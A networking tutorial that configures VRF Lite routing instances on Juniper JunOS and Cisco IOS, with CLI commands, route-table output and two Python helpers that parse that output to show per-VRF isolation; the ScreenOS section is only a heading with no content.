<p>VRF Lite is supported on most modern network hardware, but I personally have not used it outside of <a href="http://juniper.net/products/junos/">Juniper JunOS</a>, <a href="http://www.juniper.net/techpubs/software/screenos/screenos6.1.0/index.html">Juniper ScreenOS</a>, and Cisco <a href="http://cisco.com/go/ios">IOS</a>. Each platform/vendor has its own naming<sup id="fnref:3"><a href="#fn:3" rel="footnote">3</a></sup> convention for this feature, but the concept is the same in each.</p>

<blockquote>
  <p>&#8220;Gentlemen, you can&#8217;t fight in here! This is the War Room.&#8221;</p>
  
  <p><code>Pres Merkin Muffley</code></p>
</blockquote>

<ul>
<li><a href="#setup-junos">Setup on Juniper JunOS</a></li>
<li><a href="#setup-ios">Setup on Cisco IOS</a></li>
<li><a href="#setup-screenos">Setup on Juniper ScreenOS</a></li>
</ul>

<h3 id="setup-junos">VRF Lite Setup on Juniper JunOS</h3>

<div class="wp-caption" style="float: right;margin: 5px"><img src="http://praetorianprefect.com/wp-content/uploads/2009/05/untitled-2.jpg" border="0" alt="Untitled 2.jpg" width="553" height="69" /></div>

<p>For this example I will be using JunOS 8.5; while this is a slightly older version, it still has all the features needed.</p>

<p>First we need to set up some basic interfaces for later use. We will not assign them IP addresses yet, as I do not want to pollute the global routing table<sup id="fnref:2"><a href="#fn:2" rel="footnote">4</a></sup>. We will use VLANs on Ethernet interfaces to break the router <code>junos-1</code> into three virtual routers.</p>

<p>Enable VLAN tagging on the interface and create some sub-interfaces.</p>

<pre><code>set interfaces fe-0/0/0 vlan-tagging
set interfaces fe-0/0/0 unit 100 vlan-id 100
set interfaces fe-0/0/0 unit 100 description "Untrust"
set interfaces fe-0/0/0 unit 200 vlan-id 200
set interfaces fe-0/0/0 unit 200 description "Trust"
set interfaces fe-0/0/0 unit 300 vlan-id 300
set interfaces fe-0/0/0 unit 300 description "DMZ"
set interfaces fe-0/0/0 unit 400 vlan-id 400
set interfaces fe-0/0/0 unit 400 description "Trust"
</code></pre>

<p>Then verify the results and commit the changes.</p>

<pre><code>[edit]
jrossi@junos-1# show interfaces
fe-0/0/0 {
    vlan-tagging;
    unit 100 {
        description Untrust;
        vlan-id 100;
    }
    unit 200 {
        description Trust;
        vlan-id 200;
    }
    unit 300 {
        description DMZ;
        vlan-id 300;
    }
    unit 400 {
        description Trust;
        vlan-id 400;
    }
}

[edit]
jrossi@junos-1# commit
commit complete

</code></pre>

<p>Now let&#8217;s create three new routing instances: Trust, Untrust, and DMZ.  The <code>instance-type</code> knob supports quite a few instance types on JunOS, but to create a VRF Lite instance we just need to use <code>virtual-router</code>.  We also need to assign interfaces to each newly created instance.  This is very different from Cisco IOS, where VRF membership is configured under the interface itself rather than under the routing instance.</p>

<pre><code>show routing-instances
set routing-instances Trust instance-type virtual-router
set routing-instances Trust interface fe-0/0/0.200
set routing-instances Trust interface fe-0/0/0.400
set routing-instances Untrust instance-type virtual-router
set routing-instances Untrust interface fe-0/0/0.100
set routing-instances DMZ instance-type virtual-router
set routing-instances DMZ interface fe-0/0/0.300

</code></pre>

<p>View the results and commit the change.</p>

<pre><code>[edit]
jrossi@junos-1# show routing-instances
Trust {
    instance-type virtual-router;
    interface fe-0/0/0.200;
    interface fe-0/0/0.400;
}
Untrust {
    instance-type virtual-router;
    interface fe-0/0/0.100;
}
DMZ {
    instance-type virtual-router;
    interface fe-0/0/0.300;
}

[edit]
jrossi@junos-1# commit
commit complete

</code></pre>

<p>Now we have the interfaces configured and assigned to instances, but still without addresses.  If we look at the routing table, nothing from them shows up because we have not enabled any interface families.  Once we add addresses under the <code>family inet</code> interface configuration, the per-instance routing tables will begin to take shape.</p>

<pre><code>jrossi@junos-1# run show route

inet.0: 6 destinations, 6 routes (6 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

0.0.0.0/0          *[Static/5] 03:47:47
                    &gt; to 10.4.37.1 via fe-0/0/1.0
10.4.37.0/24       *[Direct/0] 1d 19:35:26
                    &gt; via fe-0/0/1.0
10.4.37.9/32       *[Local/0] 1d 19:35:26
                      Local via fe-0/0/1.0
192.168.5.0/24     *[Direct/0] 1d 13:13:18
                    &gt; via fe-0/0/1.0
192.168.5.123/32   *[Local/0] 1d 13:13:18
                      Local via fe-0/0/1.0
224.0.0.5/32       *[OSPF/10] 1d 12:50:00, metric 1
                     MultiRecv

__juniper_private2__.inet.0: 1 destinations, 1 routes (0 active, 0 holddown, 1 hidden)
</code></pre>

<p>Let&#8217;s add some interface <code>family inet</code> addresses.  I am going to use overlapping address ranges to show that when VRF is used they do not interfere with each other.</p>

<pre><code>set interfaces fe-0/0/0 unit 100 family inet address 10.10.10.1/24
set interfaces fe-0/0/0 unit 200 family inet address 172.16.10.1/24
set interfaces fe-0/0/0 unit 300 family inet address 10.10.10.1/24
set interfaces fe-0/0/0 unit 400 family inet address 192.168.10.1/24
</code></pre>

<p>Now let&#8217;s verify the changes and commit them.</p>

<pre><code>jrossi@junos-1# show interfaces fe-0/0/0 
vlan-tagging;
unit 100 {
    description Untrust;
    vlan-id 100;
    family inet {
        address 10.10.10.1/24;
    }
}
unit 200 {
    description Trust;
    vlan-id 200;
    family inet {
        address 172.16.10.1/24;
    }
}
unit 300 {
    description DMZ;
    vlan-id 300;
    family inet {
        address 10.10.10.1/24;
    }
}
unit 400 {
    description Trust;
    vlan-id 400;
    family inet {
        address 192.168.10.1/24;
    }
}

[edit]
jrossi@junos-1# commit 
commit complete
</code></pre>

<p>When we look at the routing table now, we see much more information, including the different routing instances.  The global routing table <code>inet.0</code> is the default table you would normally work with.  Further down the list are <code>DMZ.inet.0</code>, <code>Trust.inet.0</code>, and <code>Untrust.inet.0</code>; these are the newly created VRF Lite routing instances.</p>

<pre><code>[edit]
jrossi@junos-1# run show route 

inet.0: 6 destinations, 6 routes (6 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

0.0.0.0/0          *[Static/5] 04:27:06
                    &gt; to 10.4.37.1 via fe-0/0/1.0
10.4.37.0/24       *[Direct/0] 1d 20:14:45
                    &gt; via fe-0/0/1.0
10.4.37.9/32       *[Local/0] 1d 20:14:45
                      Local via fe-0/0/1.0
192.168.5.0/24     *[Direct/0] 1d 13:52:37
                    &gt; via fe-0/0/1.0
192.168.5.123/32   *[Local/0] 1d 13:52:37
                      Local via fe-0/0/1.0
224.0.0.5/32       *[OSPF/10] 1d 13:29:19, metric 1
                      MultiRecv

__juniper_private2__.inet.0: 1 destinations, 1 routes (0 active, 0 holddown, 1 hidden)

DMZ.inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

10.10.10.0/24      *[Direct/0] 00:00:06
                    &gt; via fe-0/0/0.300
10.10.10.1/32      *[Local/0] 00:00:06
                      Local via fe-0/0/0.300

Trust.inet.0: 4 destinations, 4 routes (4 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

172.16.10.0/24     *[Direct/0] 00:00:18
                    &gt; via fe-0/0/0.200
172.16.10.1/32     *[Local/0] 00:00:18
                      Local via fe-0/0/0.200
192.168.10.0/24    *[Direct/0] 00:00:06
                    &gt; via fe-0/0/0.400
192.168.10.1/32    *[Local/0] 00:00:06
                      Local via fe-0/0/0.400

Untrust.inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

10.10.10.0/24      *[Direct/0] 00:03:26
                    &gt; via fe-0/0/0.100
10.10.10.1/32      *[Local/0] 00:03:26
                      Local via fe-0/0/0.100



</code></pre>
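<p>To make the isolation in the output above concrete, here is an added example (my own code, not from the original post or from Juniper) that parses a constructed, trimmed copy of this kind of <code>show route</code> output, groups the active routes by table, flags prefixes that occur in more than one instance (allowed, that is the point of VRF) and interfaces that occur in more than one instance (a leak between instances that should never happen with <code>virtual-router</code>), and then performs a longest-prefix lookup that is confined to a single table.  The sample text, the <code>Route</code> class and the function names are assumptions of this example.</p>

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample (not a capture from the author's router): a trimmed copy
# of the kind of output "show route" prints once the per-instance tables
# exist.  Prefixes and interfaces follow the post's lab; uptimes are arbitrary.
SAMPLE_SHOW_ROUTE = """\
inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

0.0.0.0/0          *[Static/5] 04:27:06
                    > to 10.4.37.1 via fe-0/0/1.0
224.0.0.5/32       *[OSPF/10] 1d 13:29:19, metric 1
                      MultiRecv

DMZ.inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

10.10.10.0/24      *[Direct/0] 00:00:06
                    > via fe-0/0/0.300
10.10.10.1/32      *[Local/0] 00:00:06
                      Local via fe-0/0/0.300

Trust.inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

172.16.10.0/24     *[Direct/0] 00:00:18
                    > via fe-0/0/0.200
192.168.10.0/24    *[Direct/0] 00:00:06
                    > via fe-0/0/0.400

Untrust.inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

10.10.10.0/24      *[Direct/0] 00:03:26
                    > via fe-0/0/0.100
10.10.10.1/32      *[Local/0] 00:03:26
                      Local via fe-0/0/0.100
"""

TABLE_RE = re.compile(r"^(\S+): \d+ destinations, ")
ROUTE_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+/\d+)\s+\*\[(\w+)/(\d+)\]")
NEXTHOP_RE = re.compile(r"(?:to (\S+) )?via (\S+)")


@dataclass
class Route:
    prefix: ipaddress.IPv4Network
    protocol: str
    preference: int
    next_hop: Optional[str] = None   # gateway address; None for Direct/Local
    interface: Optional[str] = None  # egress logical interface, if any


def parse_show_route(text: str) -> Dict[str, List[Route]]:
    """Group the active routes of JunOS 'show route' output by routing table."""
    tables: Dict[str, List[Route]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = TABLE_RE.match(line)
        if m:
            current = m.group(1)
            tables[current] = []
            continue
        if current is None:
            continue
        m = ROUTE_RE.match(line)
        if m:
            tables[current].append(
                Route(ipaddress.ip_network(m.group(1)), m.group(2), int(m.group(3))))
            continue
        m = NEXTHOP_RE.search(line)
        if m and tables[current]:
            # indented continuation line: next hop / interface of the last route
            tables[current][-1].next_hop = m.group(1)
            tables[current][-1].interface = m.group(2)
    return tables


def prefixes_in_multiple_tables(tables: Dict[str, List[Route]]) -> Dict[str, set]:
    """Prefixes present in more than one table: allowed, that is what VRF buys you."""
    seen = defaultdict(set)
    for name, routes in tables.items():
        for r in routes:
            seen[str(r.prefix)].add(name)
    return {p: t for p, t in seen.items() if len(t) > 1}


def interfaces_in_multiple_tables(tables: Dict[str, List[Route]]) -> Dict[str, set]:
    """Interfaces reachable from more than one table: a leak between instances."""
    seen = defaultdict(set)
    for name, routes in tables.items():
        for r in routes:
            if r.interface:
                seen[r.interface].add(name)
    return {i: t for i, t in seen.items() if len(t) > 1}


def lookup(tables: Dict[str, List[Route]], table: str, destination: str) -> Optional[Route]:
    """Longest-prefix match inside one table only; None means no route at all."""
    dst = ipaddress.ip_address(destination)
    matches = [r for r in tables.get(table, []) if dst in r.prefix]
    return max(matches, key=lambda r: r.prefix.prefixlen) if matches else None
```

<p>Run against the sample, <code>10.10.10.5</code> resolves to <code>fe-0/0/0.300</code> in <code>DMZ.inet.0</code>, to <code>fe-0/0/0.100</code> in <code>Untrust.inet.0</code>, and to nothing at all in <code>Trust.inet.0</code>, which is exactly the separation the overlapping addresses were chosen to demonstrate.  An interface showing up in two tables is the condition worth alerting on in a config audit.</p>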

<p>While having interfaces with addresses and different routing tables is cool and all, by itself it does next to nothing, as there is no real routing going on yet, so let&#8217;s add some.</p>

<p>Start out by adding a default route to the <code>Trust</code> VRF Lite configuration.  The commands to do this are almost exactly the same as for the global routing table; the only difference is that you start under the <code>routing-instances</code> configuration hierarchy.  The same applies to routing protocols.</p>

<pre><code>set routing-instances Trust routing-options static route 0.0.0.0/0 next-hop 192.168.10.2
</code></pre>

<p>Now let&#8217;s verify our configuration and commit the change.</p>

<pre><code>[edit]
jrossi@junos-1# show routing-instances Trust 
instance-type virtual-router;
interface fe-0/0/0.200;
interface fe-0/0/0.400;
routing-options {
    static {
        route 0.0.0.0/0 next-hop 192.168.10.2;
    }
}

[edit]
jrossi@junos-1# commit 
commit complete
</code></pre>

<p>Now let&#8217;s take a look at the <code>Trust.inet.0</code> routing table.  This time we are going to limit our <code>show route</code> command to just the <code>Trust</code> table.</p>

<pre><code>[edit]
jrossi@junos-1# run show route table Trust 

Trust.inet.0: 5 destinations, 5 routes (5 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

0.0.0.0/0          *[Static/5] 00:36:26
                    &gt; to 192.168.10.2 via fe-0/0/0.400
172.16.10.0/24     *[Direct/0] 00:00:18
                    &gt; via fe-0/0/0.200
172.16.10.1/32     *[Local/0] 00:00:18
                      Local via fe-0/0/0.200
192.168.10.0/24    *[Direct/0] 00:56:56
                    &gt; via fe-0/0/0.400
192.168.10.1/32    *[Local/0] 00:56:56
                      Local via fe-0/0/0.400
</code></pre>

<h3 id="setup-ios">VRF Lite Setup on Cisco IOS</h3>

<div class="wp-caption" style="float: right;margin: 5px"><img src="http://praetorianprefect.com/wp-content/uploads/2009/05/2851.jpg" border="0" alt="2851.jpg" width="532" height="143" /></div>

<p>The Cisco IOS version used here, 12.4T(22), is very new and buggy, but since it is what I installed to test other IOS features, I figured it would not be a problem for this write-up.  It should also be more than adequate for VRF Lite.  Please note that there are a large number of extra interfaces and features configured on this router, as I do lots of playing around with IOS on this device.</p>

<p>Just like in the JunOS Example, we are going to create some sub-interfaces to start off with.</p>

<pre><code>ios-1(config)#int gi0/0
ios-1(config-if)#no shut
ios-1(config-if)#int gi0/0.100
ios-1(config-subif)#description Untrust
ios-1(config-subif)#encapsulation dot1Q 100
ios-1(config-subif)#int gi0/0.200
ios-1(config-subif)#description Trust
ios-1(config-subif)#encapsulation dot1Q 200
ios-1(config-subif)#int gi0/0.300
ios-1(config-subif)#description DMZ
ios-1(config-subif)#encapsulation dot1Q 300
ios-1(config-subif)#int gi0/0.400
ios-1(config-subif)#description Trust
ios-1(config-subif)#encapsulation dot1Q 400
</code></pre>

<p>Just a quick peek to see that things are as we expect them.</p>

<pre><code>ios-1(config-subif)#do show ip int br
Interface                  IP-Address      OK? Method Status                Protocol
GigabitEthernet0/0         unassigned      YES NVRAM  up                    up
GigabitEthernet0/0.100     unassigned      YES unset  up                    up
GigabitEthernet0/0.200     unassigned      YES unset  up                    up
GigabitEthernet0/0.300     unassigned      YES unset  up                    up
GigabitEthernet0/0.400     unassigned      YES unset  up                    up
GigabitEthernet0/1         1.1.1.1         YES NVRAM  up                    up
FastEthernet0/3/0          unassigned      YES unset  down                  down
FastEthernet0/3/1          unassigned      YES unset  up                    down
FastEthernet0/3/2          unassigned      YES unset  up                    down
FastEthernet0/3/3          unassigned      YES unset  up                    down
ATM0/1/0                   unassigned      YES NVRAM  administratively down down
ATM0/1/0.1                 unassigned      YES unset  administratively down down
Dot11Radio0/2/0            unassigned      YES NVRAM  up                    up
Dot11Radio0/2/0.1          192.168.128.1   YES NVRAM  up                    up
Dot11Radio0/2/0.3          192.168.11.1    YES NVRAM  up                    up
Dot11Radio0/2/0.4          192.168.4.1     YES NVRAM  up                    up
Dot11Radio0/2/0.5          unassigned      YES unset  up                    up
Dot11Radio0/2/0.10         192.168.10.1    YES NVRAM  up                    up
Dot11Radio0/2/1            unassigned      YES NVRAM  administratively down down
Vlan1                      unassigned      YES NVRAM  up                    down
Vlan3                      192.168.3.1     YES NVRAM  up                    down
Vlan5                      unassigned      YES NVRAM  up                    down
Vlan20                     192.168.20.1    YES NVRAM  up                    down
NVI0                       192.168.1.1     YES unset  up                    up
SSLVPN-VIF0                unassigned      NO  unset  up                    up
BVI3                       192.168.5.1     YES NVRAM  up                    up
Loopback1                  192.168.1.1     YES NVRAM  up                    up
Loopback69                 192.168.69.1    YES NVRAM  up                    up
Loopback100                unassigned      YES NVRAM  up                    up
Loopback666                10.10.10.2      YES NVRAM  up                    up
Tunnel255                  192.168.255.2   YES NVRAM  up                    up

ios-1(config-subif)#do show int desc
Interface                      Status         Protocol Description
Gi0/0                          up             up
Gi0/0.100                      up             up       Untrust
Gi0/0.200                      up             up       Trust
Gi0/0.300                      up             up       DMZ
Gi0/0.400                      up             up       Trust
Gi0/1                          up             up
Fa0/3/0                        down           down
Fa0/3/1                        up             down
Fa0/3/2                        up             down
Fa0/3/3                        up             down
AT0/1/0                        admin down     down
AT0/1/0.1                      admin down     down
Do0/2/0                        up             up
Do0/2/0.1                      up             up
Do0/2/0.3                      up             up
Do0/2/0.4                      up             up
Do0/2/0.5                      up             up
Do0/2/0.10                     up             up
Do0/2/1                        admin down     down
Vl1                            up             down
Vl3                            up             down
Vl5                            up             down
Vl20                           up             down
NV0                            up             up
SS0                            up             up
BV3                            up             up
Lo1                            up             up
Lo69                           up             up       for webvpn
Lo100                          up             up
Lo666                          up             up
Tu255                          up             up

</code></pre>

<p>Much like in the JunOS configuration we will now create three new routing instances (VRF Lite).</p>

<pre><code>ios-1(config)#ip vrf Untrust
ios-1(config-vrf)#description Scary wild wild west
ios-1(config-vrf)#ip vrf Trust
ios-1(config-vrf)#ip vrf DMZ
</code></pre>

<blockquote>
  <p>I don&#8217;t give a hoot in Hell how you do it, you just get me to the Primary, ya hear!</p>
  
  <p><code>Major T. J. "King" Kong</code></p>
</blockquote>

<p>Now let&#8217;s configure some interfaces and add some addresses.  Once again, I am going to use overlapping ranges to show that VRF Lite allows for it.</p>

<p>Adding an interface to a routing instance is configured under the interface configuration hierarchy itself with the command <code>ip vrf forwarding</code>.  If the interface already has an address assigned when you run <code>ip vrf forwarding</code>, that address will be removed.  This is done to make sure that conflicts or pollution of the new routing table do not happen unintentionally.</p>

<pre><code>ios-1(config)#int gi0/0.100
ios-1(config-subif)#ip vrf forwarding Untrust
ios-1(config-subif)#ip address 10.10.10.1 255.255.255.0
ios-1(config-subif)#int gi0/0.200
ios-1(config-subif)#ip vrf forwarding Trust
ios-1(config-subif)#ip address 172.16.10.1 255.255.255.0
ios-1(config-subif)#int gi0/0.300
ios-1(config-subif)#ip vrf forwarding DMZ
ios-1(config-subif)#ip address 10.10.10.1 255.255.255.0
ios-1(config-subif)#int gi0/0.400
ios-1(config-subif)#ip vrf forwarding Trust
ios-1(config-subif)#ip address 192.168.10.1 255.255.255.0

</code></pre>

<p>Before we move forward, let&#8217;s look into some of the show commands around VRFs on IOS.</p>

<pre><code>ios-1#show ip vrf 
  Name                             Default RD          Interfaces
  DMZ                              &lt;not set&gt;           Gi0/0.300
  Trust                            &lt;not set&gt;           Gi0/0.200
                                                       Gi0/0.400
  Untrust                          &lt;not set&gt;           Gi0/0.100
</code></pre>

<p>On Cisco IOS, the command <code>show ip route</code> will not show you anything about the other routing instances, just the global table.</p>

<pre><code>ios-1(config-subif)#do show ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 1.1.1.2 to network 0.0.0.0

C    192.168.128.0/24 is directly connected, Dot11Radio0/2/0.1
C    192.168.10.0/24 is directly connected, Dot11Radio0/2/0.10
C    192.168.11.0/24 is directly connected, Dot11Radio0/2/0.3
C    192.168.4.0/24 is directly connected, Dot11Radio0/2/0.4
C    192.168.5.0/24 is directly connected, BVI3
C    1.1.1.0/24 is directly connected, GigabitEthernet0/1
     192.168.255.0/30 is subnetted, 1 subnets
C       192.168.255.0 is directly connected, Tunnel255
     192.168.1.0/32 is subnetted, 1 subnets
C       192.168.1.1 is directly connected, Loopback1
C    192.168.69.0/24 is directly connected, Loopback69
O    192.168.2.0/24 [110/1001] via 192.168.255.1, 1d07h, Tunnel255
S*   0.0.0.0/0 [1/0] via 1.1.1.2
</code></pre>

<p>Using the command <code>show ip route vrf</code> we can see into each routing table, or the use of <code>show ip route vrf *</code> will let us see them all at once.</p>

<pre><code>ios-1#show ip route vrf *
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 1.1.1.1 to network 0.0.0.0

C    192.168.128.0/24 is directly connected, Dot11Radio0/2/0.1
C    192.168.10.0/24 is directly connected, Dot11Radio0/2/0.10
C    192.168.11.0/24 is directly connected, Dot11Radio0/2/0.3
C    192.168.4.0/24 is directly connected, Dot11Radio0/2/0.4
C    192.168.20.0/24 is directly connected, Vlan20
C    192.168.5.0/24 is directly connected, BVI3
C    1.1.1.0/24 is directly connected, GigabitEthernet0/1
     192.168.255.0/30 is subnetted, 1 subnets
C       192.168.255.0 is directly connected, Tunnel255
     192.168.1.0/32 is subnetted, 1 subnets
C       192.168.1.1 is directly connected, Loopback1
C    192.168.69.0/24 is directly connected, Loopback69
O    192.168.2.0/24 [110/1001] via 192.168.255.1, 1d14h, Tunnel255
C    192.168.3.0/24 is directly connected, Vlan3
S*   0.0.0.0/0 [1/0] via 1.1.1.1

Routing Table: Untrust
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     10.0.0.0/24 is subnetted, 1 subnets
C       10.10.10.0 is directly connected, GigabitEthernet0/0.100

Routing Table: Trust
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

C    192.168.10.0/24 is directly connected, GigabitEthernet0/0.400
     172.16.0.0/24 is subnetted, 1 subnets
C       172.16.10.0 is directly connected, GigabitEthernet0/0.200

Routing Table: DMZ
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     10.0.0.0/24 is subnetted, 1 subnets
C       10.10.10.0 is directly connected, GigabitEthernet0/0.300
ios-1#
</code></pre>

<p>Now let&#8217;s do a little routing.  Just like in the JunOS example, a simple static route should be sufficient.</p>

<pre><code>ios-1(config)#ip route vrf Trust 0.0.0.0 0.0.0.0 192.168.10.2
</code></pre>

<p>The <code>Trust</code> routing instance table now looks like the following.</p>

<pre><code>ios-1(config)#do show ip route vrf Trust

Routing Table: Trust
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 192.168.10.2 to network 0.0.0.0

C    192.168.10.0/24 is directly connected, GigabitEthernet0/0.400
     172.16.0.0/24 is subnetted, 1 subnets
C       172.16.10.0 is directly connected, GigabitEthernet0/0.200
S*   0.0.0.0/0 [1/0] via 192.168.10.2
</code></pre>
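<p>What the IOS output above does not show directly is the forwarding decision: the table a packet is looked up in is chosen by the VRF of the interface it arrived on.  The following is an added example (my own code, not from the post or from Cisco) that parses constructed, trimmed copies of the <code>show ip vrf</code> and <code>show ip route vrf *</code> output, handles the &#8220;is subnetted&#8221; parent rows whose children omit their mask, and then answers &#8220;where does a packet entering on this interface toward this destination go?&#8221;, including the case where a VRF has no route at all (no gateway of last resort) and the packet is dropped.  The sample text, the <code>GLOBAL</code> label, <code>short_name</code> and the other function names are assumptions of this example.</p>

```python
import ipaddress
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed samples (not captures from the author's router), trimmed to the
# lines that matter.  VRF names, interfaces and addresses follow the post's lab.
SAMPLE_SHOW_IP_VRF = """\
  Name                             Default RD          Interfaces
  DMZ                              <not set>           Gi0/0.300
  Trust                            <not set>           Gi0/0.200
                                                       Gi0/0.400
  Untrust                          <not set>           Gi0/0.100
"""

SAMPLE_SHOW_IP_ROUTE_VRF_ALL = """\
Gateway of last resort is 1.1.1.1 to network 0.0.0.0

C    1.1.1.0/24 is directly connected, GigabitEthernet0/1
S*   0.0.0.0/0 [1/0] via 1.1.1.1

Routing Table: Untrust
Gateway of last resort is not set

     10.0.0.0/24 is subnetted, 1 subnets
C       10.10.10.0 is directly connected, GigabitEthernet0/0.100

Routing Table: Trust
Gateway of last resort is 192.168.10.2 to network 0.0.0.0

C    192.168.10.0/24 is directly connected, GigabitEthernet0/0.400
     172.16.0.0/24 is subnetted, 1 subnets
C       172.16.10.0 is directly connected, GigabitEthernet0/0.200
S*   0.0.0.0/0 [1/0] via 192.168.10.2

Routing Table: DMZ
Gateway of last resort is not set

     10.0.0.0/24 is subnetted, 1 subnets
C       10.10.10.0 is directly connected, GigabitEthernet0/0.300
"""

GLOBAL = "global"  # label for interfaces that are in no VRF


class Route(NamedTuple):
    prefix: ipaddress.IPv4Network
    code: str                 # C, S*, O, ...
    via: Optional[str]        # next-hop address, for recursive routes
    interface: Optional[str]  # egress interface (short name), for connected routes


IFACE_RE = re.compile(r"^[A-Z][A-Za-z]*\d[\d/.]*$")
SECTION_RE = re.compile(r"^Routing Table: (\S+)")
SUBNETTED_RE = re.compile(r"^\s+\S+/(\d+) is subnetted")
ROUTE_RE = re.compile(
    r"^([A-Z]\*?)\s+(\d+\.\d+\.\d+\.\d+)(?:/(\d+))?(?:\s+\[\d+/\d+\])?"
    r"\s+(?:via ([\d.]+)|is directly connected, (\S+))")


def short_name(ifname: str) -> str:
    """GigabitEthernet0/0.100 -> Gi0/0.100, the form 'show ip vrf' prints."""
    m = re.match(r"^([A-Za-z]+)(.*)$", ifname)
    return m.group(1)[:2] + m.group(2) if m else ifname


def parse_show_ip_vrf(text: str) -> Dict[str, str]:
    """Map each interface (short name) to its VRF from 'show ip vrf' output."""
    membership: Dict[str, str] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0] == "Name":
            continue
        if len(tokens) > 1:            # a row that starts a new VRF
            current = tokens[0]
        if current and IFACE_RE.match(tokens[-1]):
            membership[tokens[-1]] = current
    return membership


def parse_show_ip_route_vrf_all(text: str) -> Dict[str, List[Route]]:
    """Split 'show ip route vrf *' output into one route list per table."""
    tables: Dict[str, List[Route]] = {GLOBAL: []}
    current, masklen = GLOBAL, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            tables[current] = []
            continue
        m = SUBNETTED_RE.match(line)
        if m:                          # children of this header omit their mask
            masklen = int(m.group(1))
            continue
        m = ROUTE_RE.match(line)
        if m:
            code, addr, plen, via, iface = m.groups()
            prefix = ipaddress.ip_network(f"{addr}/{plen or masklen}")
            tables[current].append(Route(prefix, code, via, short_name(iface) if iface else None))
    return tables


def forward(membership: Dict[str, str], tables: Dict[str, List[Route]],
            ingress: str, destination: str) -> Tuple[str, str]:
    """Return (vrf, decision); the table is chosen by the ingress interface's VRF."""
    vrf = membership.get(short_name(ingress), GLOBAL)
    dst = ipaddress.ip_address(destination)
    matches = [r for r in tables.get(vrf, []) if dst in r.prefix]
    if not matches:
        return vrf, "drop"            # no route in this VRF, not even a default
    best = max(matches, key=lambda r: r.prefix.prefixlen)
    return vrf, best.interface if best.interface else f"via {best.via}"
```

<p>With the sample tables, a packet for <code>10.10.10.5</code> arriving on <code>Gi0/0.100</code> leaves on <code>Gi0/0.100</code> (Untrust), the same packet arriving on <code>Gi0/0.300</code> leaves on <code>Gi0/0.300</code> (DMZ), and one arriving on <code>Gi0/0.200</code> follows the Trust default route to <code>192.168.10.2</code>; a packet for <code>172.16.10.5</code> arriving on <code>Gi0/0.100</code> is dropped, because Untrust has no route to the Trust network and no default.</p>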

<h3 id="setup-screenos">VRF Lite Setup on Juniper ScreenOS</h3>

